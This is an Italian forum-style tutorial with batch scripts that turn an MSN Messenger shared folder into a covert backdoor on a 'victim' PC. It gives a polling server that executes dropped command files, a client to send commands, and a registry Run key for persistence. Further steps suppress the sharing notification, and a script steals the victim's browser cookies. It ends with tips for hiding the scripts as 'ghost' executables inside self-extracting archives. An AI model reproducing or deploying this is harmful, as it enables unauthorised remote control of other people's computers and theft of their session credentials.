| Ecco come controllare un PC tramite msn e una cartella condivisa con la vittima prima di tutto questi sono i 2bat principali, server e client:
server:
CODICE CD "%userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\VITTIMA\Sharing Folders\ATTACKER" :1 IF EXIST comandi.xcom (goto 3) else (goto 2) :2 ping 127.0.0.1 -n 10 -w 1000 goto 1 :3 MOVE /Y comandi.xcom %systemroot%\system32\comandi.bat start %systemroot%\system32\comandi.bat GOTO 1 EXIT
client:
CODICE @echo off :1 ECHO Inserire utente a cui inviare i comandi set /P x= ECHO Digitare i comandi e poi premere ctrl+z quando si ha finito. COPY con comandi.xcom MOVE comandi.xcom "%userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\ATTACKER\Sharing Folders\%x%" goto 1
queste sn le 2bat principali..se poi volete potete crearne 1altra x far eseguire il server a ogni boot:
CODICE REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOME_CHIAVE /t REG_SZ /d PERCORSO_SERVER\NOME_SERVER /f
poi..visto che ogni volta ke eseguiamo un comando, la vittima riceve una notifica riguardo la cartella condivisa..disabilitiamo la notifica! x farlo abbiamo bisogno di manovrare 1po' sul registro.
esportiamo l'elenco delle kiavi ke ci interessano cn qst comando:
CODICE cd "%userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\VITTIMA\Sharing Folders\ATTACKER" reg export HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\PerPassportSettings kiave.txt
dovremmo avere una cosa del genere:
CODICE Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\PerPassportSettings\100568147] "DefaultSignInState"=dword:00000006 "UTL"=hex:3c,00,6d,00,73,00,6e,00,6f,00,62,00,6a,00,20,00,43,00,72,00,65,00,61,\ 00,74,00,6f,00,72,00,3d,00,22,00,70,00,69,00,63,00,63,00,6f,00,6c,00,61,00,\ 6d,00,69,00,73,00,73,00,39,00,30,00,40,00,79,00,61,00,68,00,6f,00,6f,00,2e,\ 00,69,00,74,00,22,00,20,00,54,00,79,00,70,00,65,00,3d,00,22,00,33,00,22,00,\ ........................ .......................... [HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\PerPassportSettings\100568147<--NUMERO-ID]
probabilmente troverete diversi ID..x sapere qual'č quello giusto provare a cerkare (CTRL+F) l'indirizzo email, o parte del nick e se la vittima ha configurato, non so, la cartella dove č salvata la cronologia, o le conversazioni, o qlkosa del genere, troverete qlke riferimento..quindi scorrete in alto e vedete a quale sottochiave appartiene il valore.
una volta trovato L'ID il comando x disabilitare la notifica poi č:
CODICE reg add HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\PerPassportSettings\NUMEROID /v isFileSharingToastAllowed /f /d 0 /t REG_DWORD
a questo punto avete campo libero..qualche piccolo comando utile:
Rubare Cookies: CODICE @echo off cd %userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\VITTIMA\Sharing Folders\ATTACKER md cookie copy "%userprofile%\cookies\*.*" cookie exit
P.S. ricordatevi sempre @echo off e exit, se volete rendere il comando invisibile P.P.S. Fatevi furbi..servitevi di archivi autoestraenti e compilate le bat in exe in modalitą ghost P.P.P.S. Non create 1000000bat da inviare alla vittima..basta solo ke la vittima lanci il server, tutto al + cn la bat ke aggiunge la kiave x l'esecuzione automatica al registro...il resto dei comandi li lanciate da remoto.
|